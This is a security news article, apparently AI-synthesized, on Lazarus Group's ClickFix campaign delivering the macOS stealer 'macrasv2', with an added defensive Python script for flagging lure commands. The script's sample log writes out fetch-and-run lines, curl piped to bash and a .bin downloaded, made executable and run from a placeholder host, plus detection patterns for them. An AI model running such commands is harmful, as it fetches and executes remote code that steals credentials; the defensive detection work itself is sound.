VYPR · breach
Published Apr 24, 2026 · Updated May 18, 2026 · 1 source

Lazarus Group Deploys New macOS Malware 'MacRasv2' via ClickFix Attacks on Telegram

North Korea's Lazarus Group is targeting macOS users in the FinTech and cryptocurrency sectors with a new malware kit delivered through ClickFix social engineering attacks on Telegram.

North Korea's Lazarus Group has launched a new campaign targeting macOS users in the FinTech and cryptocurrency sectors, using ClickFix social engineering attacks to deliver a novel malware kit that includes a stealer dubbed 'macrasv2'. The research, published on April 21 by security vendor Any.Run and offensive security expert Mauro Eldritch, details a sophisticated attack chain that begins with fake meeting invitations on Telegram and ends with the exfiltration of credentials, browser sessions, and macOS Keychain data.

The attack chain starts when a Lazarus operative contacts a business leader on Telegram, often using a compromised account belonging to a colleague or known contact. The attacker sends a fake Zoom, Microsoft Teams, or Google Meet invitation under the pretense of a business opportunity or job offer. When the target joins the call, they are prompted to enter a command to fix connection issues—a classic ClickFix technique that bypasses traditional security controls because the user voluntarily executes the command.

Once the user enters the command, the malware is downloaded as a macOS application packaged in a .bin file, typically given an innocuous name such as 'teamsSDK.bin'. This first-stage application installs a second-stage binary and displays a fake 'software updated' message to maintain the user's trust. The next component is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure, followed by a persistence mechanism that re-invokes the malware kit at every login.

The primary payload, 'macrasv2', is a stealer that consolidates previously collected data—including browser extension data, stored credentials, cookies, and macOS Keychain entries—into a temporary directory for exfiltration via Telegram. After exfiltration, the malware runs a self-deletion script to cover its tracks. Despite the sophistication of the attack chain, Eldritch noted that macrasv2 is 'badly written,' with several unimplemented or incorrectly implemented components, infinite loops that could expose its presence through resource starvation, and operational security weaknesses including exposed Telegram bot tokens and unauthenticated C2 endpoints.

The campaign specifically targets organizations with a substantial reliance on macOS devices, particularly in FinTech and cryptocurrency sectors. Any.Run CEO Aleksey Lapshin emphasized that macOS users should be trained out of the 'illusion of safety' many have based on the historical belief that 'Macs don't get malware.' He recommended that organizations log and restrict high-risk commands like curl, wget, osascript, and bash on endpoints, and feed ClickFix commands into EDR rules and execution policies.
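As an added illustration of the logging and restriction Lapshin recommends (example code written for this page, not from Any.Run, Mauro Eldritch or the original article): the script below triages endpoint command lines, logging any use of curl, wget, osascript or the shells, and flagging for blocking the paste-and-run shapes typical of ClickFix lures, such as a download or an inline base64 decode piped straight into a shell, inline AppleScript via osascript -e, and a dropped .bin payload made executable with chmod. The log format, the rule patterns and every sample line are constructed assumptions; they are not published indicators from the campaign.

```python
"""Triage macOS endpoint command lines for ClickFix-style paste-and-run lures.

Added example; not code from Any.Run, Mauro Eldritch or the article. The log
format, the rule names and every sample line below are constructed for
illustration.
"""
import re
from dataclasses import dataclass, field

# Binaries the article recommends logging and restricting on endpoints.
HIGH_RISK_BINARIES = {"curl", "wget", "osascript", "bash", "sh", "zsh"}

# Shapes of command line a user is typically told to paste in a ClickFix lure
# (heuristics assumed here, not published indicators): a download piped into a
# shell, an inline decode piped into a shell, inline AppleScript, and the
# drop-and-run of a .bin payload like the 'teamsSDK.bin' first stage.
SHELL = r"(sudo\s+)?(ba|z)?sh\b"
PATTERNS = [
    ("download_pipe_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*" + SHELL)),
    ("decode_pipe_shell", re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*" + SHELL)),
    ("osascript_inline", re.compile(r"\bosascript\b.*\s-e\s")),
    ("bin_drop_and_run", re.compile(r"\.bin\b.*\bchmod\b")),
]


@dataclass
class Finding:
    line_no: int
    action: str                                  # "block" or "log"
    rules: list = field(default_factory=list)    # matched ClickFix-shape rules
    binaries: list = field(default_factory=list) # high-risk binaries invoked
    command: str = ""


def invoked_binaries(command):
    """High-risk binaries in command position of each pipeline/list segment."""
    names = []
    for segment in re.split(r"\|\||&&|\||;", command):
        words = segment.split()
        if words and words[0] == "sudo":
            words = words[1:]
        if not words:
            continue
        name = words[0].rsplit("/", 1)[-1]
        if name in HIGH_RISK_BINARIES and name not in names:
            names.append(name)
    return names


def triage(command):
    """Map one command line to (action, matched rules, high-risk binaries)."""
    rules = [name for name, rx in PATTERNS if rx.search(command)]
    binaries = invoked_binaries(command)
    if rules:
        return "block", rules, binaries
    if binaries:
        return "log", rules, binaries
    return "allow", rules, binaries


def scan(log_lines):
    """Parse 'cmd=...' from each (constructed-format) log line and triage it."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        m = re.search(r"\bcmd=(.*)$", line)
        if not m:
            continue
        cmd = m.group(1)
        action, rules, binaries = triage(cmd)
        if action != "allow":
            findings.append(Finding(line_no, action, rules, binaries, cmd))
    return findings


# Constructed sample of process-execution events from an interactive Terminal.
SAMPLE_LOG = [
    "2026-04-21T10:02:11Z user=jdoe parent=Terminal cmd=git status",
    "2026-04-21T10:03:05Z user=jdoe parent=Terminal cmd=curl -fsSL https://meet.example.invalid/fix | bash",
    "2026-04-21T10:03:40Z user=jdoe parent=Terminal cmd=echo QUJDREVGR0g= | base64 -D | sh",
    "2026-04-21T10:04:12Z user=jdoe parent=Terminal cmd=curl -o /tmp/teamsSDK.bin https://meet.example.invalid/teamsSDK.bin && chmod +x /tmp/teamsSDK.bin && /tmp/teamsSDK.bin",
    "2026-04-21T10:05:00Z user=jdoe parent=Terminal cmd=osascript -e 'display dialog \"Software updated\"'",
    "2026-04-21T10:06:30Z user=jdoe parent=Terminal cmd=curl -I https://example.invalid/",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.action:5} rules={f.rules} bins={f.binaries} :: {f.command}")
```

Run as a script, the plain `git status` line is ignored, the four ClickFix-shaped lines come back as block decisions with the rule that fired, and the harmless `curl -I` is only logged. The two tiers mirror the recommendation: every high-risk binary is recorded so an analyst can review it, while only the combinations that match a lure shape are candidates for an EDR block rule.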

This campaign underscores the growing trend of nation-state actors adopting social engineering techniques that bypass technical controls by exploiting human trust. As Lapshin noted, 'Attackers always look for the cheapest entry point with the highest hit rate. Breaking through the outer moat of enterprise security gets more expensive every year, so they're picking new paths—and the cheapest path right now is one where the attacker is literally the user, voluntarily executing commands on their own machine.'

Synthesized by Vypr AI